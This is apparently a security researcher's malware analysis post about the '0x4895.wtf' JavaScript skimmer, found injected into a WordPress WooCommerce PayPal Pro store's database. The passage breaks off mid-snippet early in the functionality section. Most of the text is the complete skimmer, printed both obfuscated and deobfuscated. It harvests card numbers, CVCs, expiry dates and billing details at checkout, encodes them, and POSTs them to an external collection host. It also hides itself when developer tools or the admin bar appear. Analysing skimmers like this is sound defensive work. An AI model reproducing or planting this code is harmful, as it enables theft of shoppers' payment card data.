.wtf() Skimmer Targets WooCommerce PayPal Pro
Outline
0x4895.wtf Skimmer⌗
0x4895.wtf
is a JavaScript skimmer found injected into the database of a compromised ecommerce website that was using the WooCommerce PayPal Pro plugin and its parent software WordPress.
What is WooCommerce PayPal Pro?⌗
PayPal Payments Pro is a gateway plugin that allows you to take credit card payments via PayPal directly on your site. The customer enters their credit card details during the checkout process, and PayPal handles the rest.
Sample⌗
The skimmer’s original obfuscated format from the database table wp_wc_product_data.content is below:
<script id="vieworder">var _0x4895,_0x4643,_0x4874,_0x48B6,_0x4853,_0x474B,_0x4685,_0x493A,_0x478D,_0x48F8,_0x47AE,_0x47CF,_0x4832,_0x46A6,_0x46C7,_0x46E8,_0x4709,_0x472A,_0x48D7,_0x4811,_0x4664,_0x47F0,_0x4919,_0x476C;(function(){var _0x495B=["\x77\x74\x66","\x70\x72\x6F\x74\x6F\x74\x79\x70\x65","\x24","\x73\x70\x6C\x69\x74","\x72\x65\x64\x75\x63\x65","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6D\x61\x70","","\x72\x65\x70\x6C\x61\x63\x65","\x74\x6F\x53\x74\x72\x69\x6E\x67","[redacted]\x24\x36\x33\x24\x36\x66\x24\x36\x64","\x32\x66\x24\x36\x33\x24\x36\x38\x24\x36\x35\x24\x36\x33\x24\x36\x62\x24\x36\x66\x24\x37\x35\x24\x37\x34","\x36\x38\x24\x37\x34\x24\x37\x34\x24\x37\x30\x24\x37\x33\x24\x33\x61\x24\x32\x66\x24\x32\x66\x24\x37\x34\x24\x36\x35\x24\x36\x64\x24\x37\x30\x24\x36\x63\x24\x36\x31\x24\x37\x34\x24\x36\x35\x24\x37\x33\x24\x37\x35\x24\x37\x32\x24\x37\x36\x24\x36\x35\x24\x37\x39\x24\x32\x65\x24\x36\x33\x24\x36\x66\x24\x36\x64\x24\x32\x66\x24\x36\x31\x24\x36\x65\x24\x36\x31\x24\x36\x63\x24\x37\x39\x24\x37\x61\x24\x36\x35","\x36\x38\x24\x37\x34\x24\x37\x34\x24\x37\x30\x24\x37\x33\x24\x33\x61\x24\x32\x66\x24\x32\x66\x24\x37\x34\x24\x36\x35\x24\x36\x64\x24\x37\x30\x24\x36\x63\x24\x36\x31\x24\x37\x34\x24\x36\x35\x24\x37\x33\x24\x37\x35\x24\x37\x32\x24\x37\x36\x24\x36\x35\x24\x37\x39\x24\x32\x65\x24\x36\x33\x24\x36\x66\x24\x36\x64","\x36\x38\x24\x37\x34\x24\x37\x34\x24\x37\x30\x24\x37\x33\x24\x33\x61\x24\x32\x66\x24\x32\x66\x24\x37\x34\x24\x36\x35\x24\x36\x64\x24\x37\x30\x24\x36\x63\x24\x36\x31\x24\x37\x34\x24\x36\x35\x24\x37\x33\x24\x37\x35\x24\x37\x32\x24\x37\x36\x24\x36\x35\x24\x37\x39\x24\x32\x65\x24\x36\x33\x24\x36\x66\x24\x36\x64\x24\x32\x66\x24\x35\x33\x24\x34\x61\x24\x37\x61\x24\x35\x34\x24\x34\x33\x24\x37\x32\x24\x37\x38\x24\x34\x64\x24\x34\x66\x24\x33\x30\x24\x34\x66\x24\x33\x37\x24\x37\x34\x24\x36\x39","\x37\x37\x24\x37\x30\x24\x35\x66\x24\x37\x37\x24\x36\x66\x24\x36\x66","\x76\x69\x65\x77\x6F\x72\x64\x65\x72","\x37\x30\x24\x36\x31\x24\x37\x39\x24\x37\x30\x24\x36\x31\x24\x36\x63\x24\x37\x30\x24\x37\x32\x24\x36\x66","\x36\x36\x24\x36\x66\x24\x37\x32\x24\x36\x64\x24\x35\x62\x24\x36\x65\x24\x36\x31\x24\x36\x64\x24\x36\x35\x24\x33\x64\x24\x32\x37\x24\x36\x33\x24\x36\x38\x24\x36\x35\x24\x36\x33\x24\x36\x62\x24\x36\x66\x24\x37\x35\x24\x37\x34\x24\x32\x37\x24\x35\x64","\x36\x32\x24\x36\x39\x24\x36\x63\x24\x36\x63\x24\x36\x39\x24\x36\x65\x24\x36\x37\x24\x35\x66\x24\x36\x33\x24\x37\x32\x24\x36\x35\x24\x36\x34\x24\x36\x39\x24\x37\x32\x24\x36\x33\x24\x36\x31\x24\x37\x32\x24\x36\x34","\x36\x32\x24\x36\x39\x24\x36\x63\x24\x36\x63\x24\x36\x39\x24\x36\x65\x24\x36\x37\x24\x35\x66\x24\x36\x33\x24\x36\x33\x24\x37\x36\x24\x36\x65\x24\x37\x35\x24\x36\x64\x24\x36\x32\x24\x36\x35\x24\x37\x32","\x36\x32\x24\x36\x39\x24\x36\x63\x24\x36\x63\x24\x36\x39\x24\x36\x65\x24\x36\x37\x24\x35\x66\x24\x36\x35\x24\x37\x38\x24\x37\x30\x24\x36\x34\x24\x36\x31\x24\x37\x34\x24\x36\x35\x24\x36\x64\x24\x36\x66\x24\x36\x65\x24\x37\x34\x24\x36\x38","\x36\x32\x24\x36\x39\x24\x36\x63\x24\x36\x63\x24\x36\x39\x24\x36\x65\x24\x36\x37\x24\x35\x66\x24\x36\x35\x24\x37\x38\x24\x37\x30\x24\x36\x34\x24\x36\x31\x24\x37\x34\x24\x36\x35\x24\x37\x39\x24\x36\x35\x24\x36\x31\x24\x37\x32","\x36\x39\x24\x36\x65\x24\x37\x30\x24\x37\x35\x24\x37\x34\x24\x32\x33\x24\x37\x30\x24\x36\x31\x24\x37\x39\x24\x36\x64\x24\x36\x35\x24\x36\x65\x24\x37\x34\x24\x35\x66\x24\x36\x64\x24\x36\x35\x24\x37\x34\x24\x36\x38\x24\x36\x66\x24\x36\x34\x24\x35\x66\x24\x37\x30\x24\x36\x31\x24\x37\x39\x24\x37\x30\x24\x36\x31\x24\x36\x63\x24\x37\x30\x24\x37\x32\x24\x36\x66","\x6A\x73","\x73\x63\x72\x69\x70\x74","\x63\x73\x73","\x6C\x69\x6E\x6B","\x6E\x6F\x6E\x65","\x69\x64","\x68\x72\x65\x66","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x6C\x65\x6E\x67\x74\x68","\x67\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x6C\x6F\x67","\x72\x6F\x74\x31\x33","\x5A","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x72\x6F\x74\x35","\x6A\x6F\x69\x6E","\x67\x65\x74\x4F\x77\x6E\x50\x72\x6F\x70\x65\x72\x74\x79\x44\x65\x73\x63\x72\x69\x70\x74\x6F\x72","\x64\x65\x66\x69\x6E\x65\x50\x72\x6F\x70\x65\x72\x74\x79","\x49\x6E\x20\x63\x6F\x6C\x6C\x65\x63\x74\x44\x61\x74\x61","\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x41\x72\x72\x61\x79","\x73\x68\x69\x70\x70\x69\x6E\x67\x5F","\x6E\x61\x6D\x65","\x62\x69\x6C\x6C\x69\x6E\x67\x5F","\x76\x61\x6C\x75\x65","\x65\x61\x63\x68","\x69\x6E\x70\x75\x74\x5B\x69\x64\x2A\x3D\x22","\x22\x5D\x3A\x76\x69\x73\x69\x62\x6C\x65","\x66\x69\x6E\x64","\x61\x74\x74\x72","\x2D\x63\x61\x72\x64\x2D\x6E\x75\x6D\x62\x65\x72","\x2D\x63\x61\x72\x64\x2D\x63\x76\x63","\x2D\x63\x61\x72\x64\x2D\x65\x78\x70\x69\x72\x79","\x20\x2F\x20","\x5F\x63\x63\x5F\x6F\x77\x6E\x65\x72","\x63\x68\x65\x63\x6B\x65\x64","\x70\x72\x6F\x70","\x49\x6E\x20\x70\x72\x6F\x63\x65\x73\x73\x50\x6C\x61\x63\x65\x4F\x72\x64\x65\x72","\x73\x75\x62\x6D\x69\x74","\x70\x72\x6F\x63\x65\x73\x73\x50\x6C\x61\x63\x65\x4F\x72\x64\x65\x72\x3A\x53\x55\x42\x4D\x49\x54","\x42\x61\x64\x20\x70\x61\x79\x6D\x65\x6E\x74\x20\x74\x79\x70\x65","\x50\x61\x79\x6D\x65\x6E\x74\x20\x73\x65\x6E\x64\x65\x64","\x61\x6C\x77\x61\x79\x73","\x50\x4F\x53\x54","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x74\x65\x78\x74\x2F\x70\x6C\x61\x69\x6E","\x61\x6A\x61\x78","\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x20\x6F\x6E\x20\x73\x75\x62\x6D\x69\x74","\x6F\x6E","\x49\x6E\x20\x77\x61\x69\x74\x50\x6C\x61\x63\x65\x4F\x72\x64\x65\x72","\x3A\x76\x69\x73\x69\x62\x6C\x65","\x69\x73","\x77\x61\x69\x74\x50\x6C\x61\x63\x65\x4F\x72\x64\x65\x72\x3A\x20\x4F\x4B","\x49\x6E\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x20\x72\x65\x61\x64\x79","\x67\x65\x74","\x23\x77\x70\x61\x64\x6D\x69\x6E\x62\x61\x72","\x72\x65\x61\x64\x79","\x6F\x75\x74\x65\x72\x57\x69\x64\x74\x68","\x69\x6E\x6E\x65\x72\x57\x69\x64\x74\x68","\x6F\x75\x74\x65\x72\x48\x65\x69\x67\x68\x74","\x69\x6E\x6E\x65\x72\x48\x65\x69\x67\x68\x74","\x46\x69\x72\x65\x62\x75\x67","\x63\x68\x72\x6F\x6D\x65","\x69\x73\x49\x6E\x69\x74\x69\x61\x6C\x69\x7A\x65\x64","\x49\x6E\x20\x77\x61\x69\x74\x46\x6F\x72\x4A\x71\x75\x65\x72\x79","\x6A\x51\x75\x65\x72\x79","\x77\x61\x69\x74\x46\x6F\x72\x4A\x71\x75\x65\x72\x79\x3A\x20\x4F\x4B","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];function _0x497C(){var _0x4A42=this[_0x495B[3]](_0x495B[2]);var _0x4A63=_0x4A42[_0x495B[6]](function(_0x4A84){return String[_0x495B[5]](parseInt(_0x4A84,16))})[_0x495B[4]](function(_0x4AA5,_0x4AC6){return _0x4AA5+ _0x4AC6});return _0x4A63[_0x495B[9]]()[_0x495B[8]](/,/g,_0x495B[7])}function _0x499D(_0x4B08,_0x4B29){var _0x4B8C=(_0x4B29=== _0x495B[24])?_0x495B[25]:(_0x4B29=== _0x495B[26])?_0x495B[27]:_0x495B[28];var _0x4B6B=(_0x4B29=== _0x495B[24])?_0x495B[29]:(_0x4B29=== _0x495B[26])?_0x495B[30]:_0x495B[28];var _0x4AE7=document[_0x495B[31]](_0x4B8C);if(!_0x495B){_0x49BE(0,false,false);return};for(var _0x4B4A=_0x4AE7[_0x495B[32]];_0x4B4A>= 0;_0x4B4A--){if(_0x4AE7[_0x4B4A]&& _0x4AE7[_0x4B4A][_0x495B[33]](_0x4B6B)!== null&& _0x4AE7[_0x4B4A][_0x495B[33]](_0x4B6B)[_0x495B[34]](_0x4B08)!== -1){_0x4AE7[_0x4B4A][_0x495B[36]][_0x495B[35]](_0x4AE7[_0x4B4A])}}}function _0x49BE(_0x4BCE,_0x4BAD){if(_0x4685){console[_0x495B[37]](_0x4BCE)}}if(!_0x49BE){_0x49DF= 0;return};function _0x49DF(){String[_0x495B[1]][_0x495B[38]]= function(){return this[_0x495B[8]](/[a-zA-Z]/g,function(_0x4A84){return String[_0x495B[5]]((_0x4A84<= _0x495B[39]?90:122)>= (_0x4A84= _0x4A84[_0x495B[40]](0)+ 13)?_0x4A84:_0x4A84- 26)})};String[_0x495B[1]][_0x495B[41]]= function(){var _0x4A63=[];for(i= 0;i< this[_0x495B[32]];i++){idx= this[_0x495B[40]](i);if((idx>= 48)&& (idx<= 57)){if(idx<= 52){if(!_0x4A00){return};_0x4A63[i]= String[_0x495B[5]](((idx+ 5)))}else {_0x4A63[i]= String[_0x495B[5]](((idx- 5)))}}else {_0x4A63[i]= String[_0x495B[5]](idx)}};return _0x4A63[_0x495B[42]](_0x495B[7])};function _0x4BEF(_0x4D39){return btoa(encodeURIComponent(_0x4D39)[_0x495B[8]](/%([0-9A-F]{2})/g,function(_0x4D5A,_0x4D7B){return String[_0x495B[5]](parseInt(_0x4D7B,16))}))}function _0x4CB5(_0x4DFF,_0x4E20,_0x4DDE){if(!_0x495B){return};if(_0x4E20!== _0x4DDE&& _0x4DFF[_0x4E20]){Object[_0x495B[44]](_0x4DFF,_0x4DDE,Object[_0x495B[43]](_0x4DFF,_0x4E20));delete _0x4DFF[_0x4E20]}}var _0x4C31={url:_0x4895[_0x495B[0]](),type:_0x474B[_0x495B[0]](),mer:_0x47CF[_0x495B[0]]()};function _0x4C10(_0x4D9C){_0x49BE(_0x495B[45],1);jQuery[_0x495B[51]](_0x4D9C[_0x495B[46]](),function(){if(!_0x495B){_0x4A00();return};if((this[_0x495B[48]][_0x495B[34]](_0x495B[47])!== -1|| this[_0x495B[48]][_0x495B[34]](_0x495B[49])!== -1|| this[_0x495B[48]][_0x495B[34]](_0x47CF[_0x495B[0]]())!== -1)&& this[_0x495B[50]]!= _0x495B[7]){_0x4C31[this[_0x495B[48]]]= this[_0x495B[50]]}});if(!_0x495B){_0x4A00(_0x495B[41],_0x495B[67]);return};jQuery[_0x495B[51]](_0x4D9C[_0x495B[54]](_0x495B[52]+ _0x47CF[_0x495B[0]]()+ _0x495B[53]),function(){_0x4C31[jQuery(this)[_0x495B[55]](_0x495B[29])]= this[_0x495B[50]]});_0x4CB5(_0x4C31,_0x46A6[_0x495B[0]](),_0x47CF[_0x495B[0]]()+ _0x495B[56]);_0x4CB5(_0x4C31,_0x46C7[_0x495B[0]](),_0x47CF[_0x495B[0]]()+ _0x495B[57]);if(!_0x495B){return};_0x4CB5(_0x4C31,_0x46E8[_0x495B[0]](),_0x47CF[_0x495B[0]]()+ _0x495B[58]);if(_0x4709&& _0x4C31[_0x4709[_0x495B[0]]()]){_0x4C31[_0x47CF[_0x495B[0]]()+ _0x495B[58]]= _0x4C31[_0x47CF[_0x495B[0]]()+ _0x495B[58]]+ _0x495B[59]+ _0x4C31[_0x4709[_0x495B[0]]()];delete _0x4C31[_0x4709[_0x495B[0]]()]};if(_0x472A){_0x4CB5(_0x4C31,_0x472A[_0x495B[0]](),_0x47CF[_0x495B[0]]()+ _0x495B[60])}}function _0x4C52(){if(_0x48D7){return jQuery(_0x48D7[_0x495B[0]]())[_0x495B[62]](_0x495B[61])}else {return true}}function _0x4C94(){_0x49BE(_0x495B[63],1);jQuery(_0x4832[_0x495B[0]]())[_0x495B[74]](_0x495B[64],function(){try{_0x49BE(_0x495B[65],1);if(!_0x4C52()){_0x49BE(_0x495B[66],2);return true};_0x4C10(jQuery(_0x4832[_0x495B[0]]()));_0x49BE(_0x4C31,2);if(_0x497C=== null){_0x4A00= false;return};jQuery[_0x495B[72]]({type:_0x495B[69],url:_0x4874[_0x495B[0]](),data:_0x4BEF(JSON[_0x495B[70]](_0x4C31)[_0x495B[38]]()[_0x495B[41]]()),timeout:20000,contentType:_0x495B[71]})[_0x495B[68]](function(){_0x49BE(_0x495B[67],2);if(!_0x495B){_0x497C= null}else {return true}})}catch(e){if(!_0x495B){_0x4A00()};_0x49BE(_0x495B[73],2);return true}})}function _0x4CD6(){var _0x4E41=setInterval(function(){_0x49BE(_0x495B[75],1);if(jQuery(_0x4832[_0x495B[0]]())[_0x495B[77]](_0x495B[76])&& _0x4C52()){_0x49BE(_0x495B[78],1);clearInterval(_0x4E41);_0x4C94()}},_0x493A)}jQuery(document)[_0x495B[82]](function(){if(!_0x495B){_0x49DF(_0x495B[40],1,0);return};_0x49BE(_0x495B[79],1);if(jQuery(_0x495B[81])[_0x495B[80]](0)){_0x499D(_0x47AE,_0x495B[24])}else {if(!_0x49DF){_0x4A21(false,false);return};_0x4CD6()}});if(_0x49DF== 1){return};function _0x4C73(_0x4DBD){if(!_0x4685){_0x499D(_0x47AE,_0x495B[24])}}setInterval(function(){var _0x4D18=window[_0x495B[83]]- window[_0x495B[84]]> _0x48F8;var _0x4CF7=window[_0x495B[85]]- window[_0x495B[86]]> _0x48F8;if(!(_0x4CF7&& _0x4D18)&& ((window[_0x495B[87]]&& window[_0x495B[87]][_0x495B[88]]&& window[_0x495B[87]][_0x495B[88]][_0x495B[89]])|| _0x4D18|| _0x4CF7)){if(!_0x478D){_0x4C73(true)};_0x478D= true}else {if(_0x478D){_0x4C73(false)};_0x478D= false}},500)}function _0x4A00(_0x4E62){_0x49BE(_0x495B[90],1);if(window[_0x495B[91]]){_0x49BE(_0x495B[92],1);_0x4E62()}else {if(!_0x495B){_0x49DF();return};setTimeout(function(){_0x4A00(_0x4E62)},_0x493A)}}function _0x4A21(){if(window[_0x495B[93]][_0x495B[30]][_0x495B[34]](_0x4895[_0x495B[0]]())!== -1&& window[_0x495B[93]][_0x495B[30]][_0x495B[34]](_0x4643[_0x495B[0]]())!== -1){_0x4A00(_0x49DF)}else {_0x499D(_0x47AE,_0x495B[24])}}_0x4811= _0x499D;_0x4664= _0x49BE;_0x47F0= _0x49DF;_0x4919= _0x4A00;if(!_0x499D){_0x4A21(1);return};_0x476C= _0x4A21;String[_0x495B[1]][_0x495B[0]]= _0x497C;_0x4895= _0x495B[10];_0x4643= _0x495B[11];_0x4874= _0x495B[12];_0x48B6= _0x495B[13];_0x4853= _0x495B[14];_0x474B= _0x495B[15];if(!_0x49BE){return};_0x4685= false;_0x493A= 500;_0x478D= false;_0x48F8= 160;_0x47AE= _0x495B[16];_0x47CF= _0x495B[17];_0x4832= _0x495B[18];_0x46A6= _0x495B[19];_0x46C7= _0x495B[20];_0x46E8= _0x495B[21];if(_0x497C== true){_0x497C();_0x497C= true;return}else {_0x4709= _0x495B[22]};_0x472A= _0x495B[7];_0x48D7= _0x495B[23];_0x4A21()})()</script>
And here’s the deobfuscated version:
var _0x4895,
_0x4643,
_0x4874,
_0x48B6,
_0x4853,
_0x474B,
_0x4685,
_0x493A,
_0x478D,
_0x48F8,
_0x47AE,
_0x47CF,
_0x4832,
_0x46A6,
_0x46C7,
_0x46E8,
_0x4709,
_0x472A,
_0x48D7,
_0x4811,
_0x4664,
_0x47F0,
_0x4919,
_0x476C;
(function () {
var _0x495B = [
"wtf",
"prototype",
"$",
"split",
"reduce",
"fromCharCode",
"map",
"",
"replace",
"toString",
"[redacted]$63$6f$6d",
// "[redacted].com",
"2f$63$68$65$63$6b$6f$75$74",
// "/checkout",
"68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65",
// "https://templatesurvey.com/analyze",
"68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d",
// "https://templatesurvey.com",
"68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69",
// "https://templatesurvey.com/SJzTCrxMO0O7ti",
"77$70$5f$77$6f$6f",
// "wp_woo",
"vieworder",
"70$61$79$70$61$6c$70$72$6f",
// "paypalpro",
"66$6f$72$6d$5b$6e$61$6d$65$3d$27$63$68$65$63$6b$6f$75$74$27$5d",
// "form[name='checkout']",
"62$69$6c$6c$69$6e$67$5f$63$72$65$64$69$72$63$61$72$64",
// "billing_credircard",
"62$69$6c$6c$69$6e$67$5f$63$63$76$6e$75$6d$62$65$72",
// "billing_ccvnumber",
"62$69$6c$6c$69$6e$67$5f$65$78$70$64$61$74$65$6d$6f$6e$74$68",
// "billing_expdatemonth",
"62$69$6c$6c$69$6e$67$5f$65$78$70$64$61$74$65$79$65$61$72",
// "billing_expdateyear",
"69$6e$70$75$74$23$70$61$79$6d$65$6e$74$5f$6d$65$74$68$6f$64$5f$70$61$79$70$61$6c$70$72$6f",
// "input#payment_method_paypalpro",
"js",
"script",
"css",
"link",
"none",
"id",
"href",
"getElementsByTagName",
"length",
"getAttribute",
"indexOf",
"removeChild",
"parentNode",
"log",
"rot13",
"Z",
"charCodeAt",
"rot5",
"join",
"getOwnPropertyDescriptor",
"defineProperty",
"In collectData",
"serializeArray",
"shipping_",
"name",
"billing_",
"value",
"each",
'input[id*="',
'"]:visible',
"find",
"attr",
"-card-number",
"-card-cvc",
"-card-expiry",
" / ",
"_cc_owner",
"checked",
"prop",
"In processPlaceOrder",
"submit",
"processPlaceOrder:SUBMIT",
"Bad payment type",
"Payment sended",
"always",
"POST",
"stringify",
"text/plain",
"ajax",
"Exception on submit",
"on",
"In waitPlaceOrder",
":visible",
"is",
"waitPlaceOrder: OK",
"In document ready",
"get",
"#wpadminbar",
"ready",
"outerWidth",
"innerWidth",
"outerHeight",
"innerHeight",
"Firebug",
"chrome",
"isInitialized",
"In waitForJquery",
"jQuery",
"waitForJquery: OK",
"location",
];
function _0x497C() {
var _0x4A42 = this.split("$");
var _0x4A63 = _0x4A42
.map(function (_0x4A84) {
return String.fromCharCode(parseInt(_0x4A84, 16));
})
.reduce(function (_0x4AA5, _0x4AC6) {
return _0x4AA5 + _0x4AC6;
});
return _0x4A63.toString().replace(/,/g, "");
}
function _0x499D(_0x4B08, _0x4B29) {
var _0x4B8C =
_0x4B29 === "js" ? "script" : _0x4B29 === "css" ? "link" : "none";
var _0x4B6B = _0x4B29 === "js" ? "id" : _0x4B29 === "css" ? "href" : "none";
var _0x4AE7 = document.getElementsByTagName(_0x4B8C);
for (var _0x4B4A = _0x4AE7.length; _0x4B4A >= 0; _0x4B4A--) {
if (
_0x4AE7[_0x4B4A] &&
_0x4AE7[_0x4B4A].getAttribute(_0x4B6B) !== null &&
_0x4AE7[_0x4B4A].getAttribute(_0x4B6B).indexOf(_0x4B08) !== -1
) {
_0x4AE7[_0x4B4A].parentNode.removeChild(_0x4AE7[_0x4B4A]);
}
}
}
function _0x49BE(_0x4BCE, _0x4BAD) {
if (_0x4685) {
console.log(_0x4BCE);
}
}
if (!_0x49BE) {
_0x49DF = 0;
return;
}
function _0x49DF() {
String.prototype.rot13 = function () {
return this.replace(/[a-zA-Z]/g, function (_0x4A84) {
return String.fromCharCode(
(_0x4A84 <= "Z" ? 90 : 122) >= (_0x4A84 = _0x4A84.charCodeAt(0) + 13)
? _0x4A84
: _0x4A84 - 26
);
});
};
String.prototype.rot5 = function () {
var _0x4A63 = [];
for (i = 0; i < this.length; i++) {
idx = this.charCodeAt(i);
if (idx >= 48 && idx <= 57) {
if (idx <= 52) {
if (!_0x4A00) {
return;
}
_0x4A63[i] = String.fromCharCode(idx + 5);
} else {
_0x4A63[i] = String.fromCharCode(idx - 5);
}
} else {
_0x4A63[i] = String.fromCharCode(idx);
}
}
return _0x4A63.join("");
};
function _0x4BEF(_0x4D39) {
return btoa(
encodeURIComponent(_0x4D39).replace(/%([0-9A-F]{2})/g, function (
_0x4D5A,
_0x4D7B
) {
return String.fromCharCode(parseInt(_0x4D7B, 16));
})
);
}
function _0x4CB5(_0x4DFF, _0x4E20, _0x4DDE) {
if (_0x4E20 !== _0x4DDE && _0x4DFF[_0x4E20]) {
Object.defineProperty(
_0x4DFF,
_0x4DDE,
Object.getOwnPropertyDescriptor(_0x4DFF, _0x4E20)
);
delete _0x4DFF[_0x4E20];
}
}
var _0x4C31 = {
url: _0x4895.wtf(),
type: _0x474B.wtf(),
mer: _0x47CF.wtf(),
};
function _0x4C10(_0x4D9C) {
_0x49BE("In collectData", 1);
jQuery.each(_0x4D9C.serializeArray(), function () {
if (
(this.name.indexOf("shipping_") !== -1 ||
this.name.indexOf("billing_") !== -1 ||
this.name.indexOf(_0x47CF.wtf()) !== -1) &&
this.value != ""
) {
_0x4C31[this.name] = this.value;
}
});
jQuery.each(
_0x4D9C.find('input[id*="' + _0x47CF.wtf() + '"]:visible'),
function () {
_0x4C31[jQuery(this).attr("id")] = this.value;
}
);
_0x4CB5(_0x4C31, _0x46A6.wtf(), _0x47CF.wtf() + "-card-number");
_0x4CB5(_0x4C31, _0x46C7.wtf(), _0x47CF.wtf() + "-card-cvc");
_0x4CB5(_0x4C31, _0x46E8.wtf(), _0x47CF.wtf() + "-card-expiry");
if (_0x4709 && _0x4C31[_0x4709.wtf()]) {
_0x4C31[_0x47CF.wtf() + "-card-expiry"] =
_0x4C31[_0x47CF.wtf() + "-card-expiry"] +
" / " +
_0x4C31[_0x4709.wtf()];
delete _0x4C31[_0x4709.wtf()];
}
if (_0x472A) {
_0x4CB5(_0x4C31, _0x472A.wtf(), _0x47CF.wtf() + "_cc_owner");
}
}
function _0x4C52() {
if (_0x48D7) {
return jQuery(_0x48D7.wtf()).prop("checked");
} else {
return true;
}
}
function _0x4C94() {
_0x49BE("In processPlaceOrder", 1);
jQuery(_0x4832.wtf()).on("submit", function () {
try {
_0x49BE("processPlaceOrder:SUBMIT", 1);
if (!_0x4C52()) {
_0x49BE("Bad payment type", 2);
return true;
}
_0x4C10(jQuery(_0x4832.wtf()));
_0x49BE(_0x4C31, 2);
if (_0x497C === null) {
_0x4A00 = false;
return;
}
jQuery
.ajax({
type: "POST",
url: _0x4874.wtf(),
data: _0x4BEF(JSON.stringify(_0x4C31).rot13().rot5()),
timeout: 20000,
contentType: "text/plain",
})
.always(function () {
_0x49BE("Payment sended", 2);
{
return true;
}
});
} catch (e) {
_0x49BE("Exception on submit", 2);
return true;
}
});
}
function _0x4CD6() {
var _0x4E41 = setInterval(function () {
_0x49BE("In waitPlaceOrder", 1);
if (jQuery(_0x4832.wtf()).is(":visible") && _0x4C52()) {
_0x49BE("waitPlaceOrder: OK", 1);
clearInterval(_0x4E41);
_0x4C94();
}
}, _0x493A);
}
jQuery(document).ready(function () {
_0x49BE("In document ready", 1);
if (jQuery("#wpadminbar").get(0)) {
_0x499D(_0x47AE, "js");
} else {
if (!_0x49DF) {
_0x4A21(false, false);
return;
}
_0x4CD6();
}
});
if (_0x49DF == 1) {
return;
}
function _0x4C73(_0x4DBD) {
if (!_0x4685) {
_0x499D(_0x47AE, "js");
}
}
setInterval(function () {
var _0x4D18 = window.outerWidth - window.innerWidth > _0x48F8;
var _0x4CF7 = window.outerHeight - window.innerHeight > _0x48F8;
if (
!(_0x4CF7 && _0x4D18) &&
((window.Firebug &&
window.Firebug.chrome &&
window.Firebug.chrome.isInitialized) ||
_0x4D18 ||
_0x4CF7)
) {
if (!_0x478D) {
_0x4C73(true);
}
_0x478D = true;
} else {
if (_0x478D) {
_0x4C73(false);
}
_0x478D = false;
}
}, 500);
}
function _0x4A00(_0x4E62) {
_0x49BE("In waitForJquery", 1);
if (window.jQuery) {
_0x49BE("waitForJquery: OK", 1);
_0x4E62();
} else {
setTimeout(function () {
_0x4A00(_0x4E62);
}, _0x493A);
}
}
function _0x4A21() {
if (
window.location.href.indexOf(_0x4895.wtf()) !== -1 &&
window.location.href.indexOf(_0x4643.wtf()) !== -1
) {
_0x4A00(_0x49DF);
} else {
_0x499D(_0x47AE, "js");
}
}
_0x4811 = _0x499D;
_0x4664 = _0x49BE;
_0x47F0 = _0x49DF;
_0x4919 = _0x4A00;
if (!_0x499D) {
_0x4A21(1);
return;
}
_0x476C = _0x4A21;
String.prototype.wtf = _0x497C;
_0x4895 = "[redacted]$2e$63$6f$6d";
// _0x4895 = "[redacted].com";
_0x4643 = "2f$63$68$65$63$6b$6f$75$74";
// _0x4643 = "/checkout";
_0x4874 =
"68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65";
// https://templatesurvey.com/analyze
_0x48B6 =
"68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d";
// "https://templatesurvey.com";
_0x4853 =
"68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69";
// "https://templatesurvey.com/SJzTCrxMO0O7ti";
_0x474B = "77$70$5f$77$6f$6f";
// _0x474B = "wp_woo";
if (!_0x49BE) {
return;
}
_0x4685 = false;
_0x493A = 500;
_0x478D = false;
_0x48F8 = 160;
_0x47AE = "vieworder";
_0x47CF = "70$61$79$70$61$6c$70$72$6f";
// _0x47CF = "paypalpro";
_0x4832 = "66$6f$72$6d$5b$6e$61$6d$65$3d$27$63$68$65$63$6b$6f$75$74$27$5d";
// _0x4832 = "form[name='checkout']";
_0x46A6 = "62$69$6c$6c$69$6e$67$5f$63$72$65$64$69$72$63$61$72$64";
// _0x46A6 = "billing_credircard";
_0x46C7 = "62$69$6c$6c$69$6e$67$5f$63$63$76$6e$75$6d$62$65$72";
// _0x46C7 = "billing_ccvnumber";
_0x46E8 = "62$69$6c$6c$69$6e$67$5f$65$78$70$64$61$74$65$6d$6f$6e$74$68";
// _0x46E8 = "billing_expdatemonth";
if (_0x497C == true) {
_0x497C();
_0x497C = true;
return;
} else {
_0x4709 = "62$69$6c$6c$69$6e$67$5f$65$78$70$64$61$74$65$79$65$61$72";
// _0x4709 = "billing_expdateyear";
}
_0x472A = "";
_0x48D7 =
"69$6e$70$75$74$23$70$61$79$6d$65$6e$74$5f$6d$65$74$68$6f$64$5f$70$61$79$70$61$6c$70$72$6f";
// "input#payment_method_paypalpro";
_0x4A21();
})();
Skimmer Deetz⌗
Functionality⌗
The skimmer operates by capturing the POST data sent from the victim on the /checkout
URL of the infected Woocommerce website. If the URL does not contain the expected domain name (_0x4895
) and also /checkout
(_0x4643
), then the skimmer won’t operate:
function _0x4A21() {
if (
window.location.href.indexOf(_0x4895.wtf()) !== -1 &&
window.location.href.indexOf(_0x4643.wtf()) !== -1
